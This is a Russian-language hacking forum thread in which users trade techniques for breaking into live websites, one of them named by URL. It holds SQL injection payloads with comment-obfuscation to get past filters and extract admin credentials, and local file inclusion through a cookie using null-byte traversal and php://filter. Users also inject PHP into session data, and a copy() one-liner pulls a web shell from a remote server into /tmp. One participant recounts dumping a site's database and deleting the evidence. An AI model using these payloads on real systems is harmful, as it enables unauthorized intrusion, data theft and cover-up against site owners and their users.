ОК раскроем карты http://biz.podolsk.ru/picturebrowse.php?catid=15 я не волшебник. я только учусь))) испробовал море всего уязвимость 100% а застрял то в самом начале. у?catid=15-7 производит вычисление catid=8 ?catid=15 group by 1 вроде все норм ?catid=15 group by 2 уже облом выходит что 1? хм странно!? походу тут фильтрация union вот тут собственно я заработал шизофрению! моя проблема в том что я не могу догнать логику раскручивания фильтрации. прошу помощи и так сказать носом ткнуть.
-146+union+/*!select*/+1,2,(/*!select+admin+from+admins*/),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 Вместо конструкции select+admin+from+admins можно подставить UPDATE запрос? А то что-то у меня не выходит?
SELECT g.id FROM categories g LEFT JOIN msk.categories l ON g.id=l.id WHERE (g.spr_sel_super>0 OR l.sel_super>0) AND g.spr_visible=1 AND l.visible=1 ORDER BY IF(g.spr_sel_super>0, g.spr_sel_super, l.sel_super) DESC, RAND() LIMIT [SQL] Как можно заюзать? я всю голову сломал Обычный union не берет вроде
Помогите советом. Есть LFI но в параметре кукисов. Логи не удалось найти, но можно подключать сессию. Первая проблема это какие варианты в сессию запихнуть шелл (типа CMD), пытался в имени вставить, вставляет, но в сессии строки нет. Хотел прочитать php файлы, но они выдаются уже исполненные. исходник не удается прочитать, может есть какие-то варианты?
VY_CMa Не читает, уже все возможные комбинации пробивал и логов и конфигов, нашел только настройки апача, в них указан путь логов, но почему-то не читает по этому пути, это загадка конечно почему. Zed0x Как именно это должно выглядеть? Пробовал так же: php://filter/convert.base64-encode/resource=/home/httpd/html/site.com/public_html/index.php Но так же не срабатывает, по каким именно причинам не знаю. Срабатывают инклюды только с %00 Возможно это как-то связано именно с параметром куки? или разницы нет, что это переменная в урле, что куки?
Если так ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fsite.com%2Findex%2Ephp%00 То так тоже выдает уже выполненный php
выдает уже выполненный php, наверное потому что у тебя инклюд а не читалка. к логам и енвирону вполне вероятно нету прав на чтение. ищи то на что есть права
Expl0ited Да уже перепробовал все, вот только сессия доступна и FD но в них что-то никак немогу найти то что нужно в логах, они с запозданием туда попадают и почему-то разные извращения с <?php eval($_GET[cmd]); ?> не заносятся. Но вышло проще, форма заполнения профиля не фильтруется нифига, потому если вставить в имя например <?php phpinfo()?> и потом проинклюдить сессию, то видно результат выполнения phpinfo() Теперь я так понимаю мне нужно методом copy залить шелл в tmp, верно? а потом проинклюдить и нормально его разместить в системе....потому как не знаю какие права на запись есть у каких папок
<?php copy('http://сервер/твойшелл','/tmp/shell.txt');?> потом из кук инклюдишь /tmp/shell.txt ищешь диру и ты молодец. а вообще молодец, сам задал вопрос - сам ответил ) побольше бы таких
Теперь другая проблема, шелл то заинклюдил в куки, но везде все надписи сереневым цветом. User: 48 ( apache ) Group: 48 ( apache ) Cwd: u--------- С таким развитием событий не сталкивался еще, директории никакие не видны, все на запись запрещено, как дальше двигаться? Хотя читать через и передвигаться вручную с помощью ChangeDir и ReadFile можно, но почему не работает шел в нормальном режиме...
Видимо у Вас Safe_mod, да и права говорят сами за за себя! Попробуй прочитать все возможные папки на чтение, бывали варианты, что можно прочитать соседа, а то и залиться к нему! Пробуйте, в общем!
cat1vo Заливался в разные папки, но все равно так же. сейф моуд стоит off Ну да ладно, и руками справился, нашел конфиги вручную, подключился базе, слил в доступную папку и скачал через сам сайт, ибо из шела даже скачать файлы нельзя, ну и потом же таким геморройным путем удалил дампы, через форму и инклюд)
Такой вопрос PHP хранит свои сессии в известных папках, tmp и.т.д А где хранятся сессии JSESSIONID, если стоит ява и Apache Tomcat?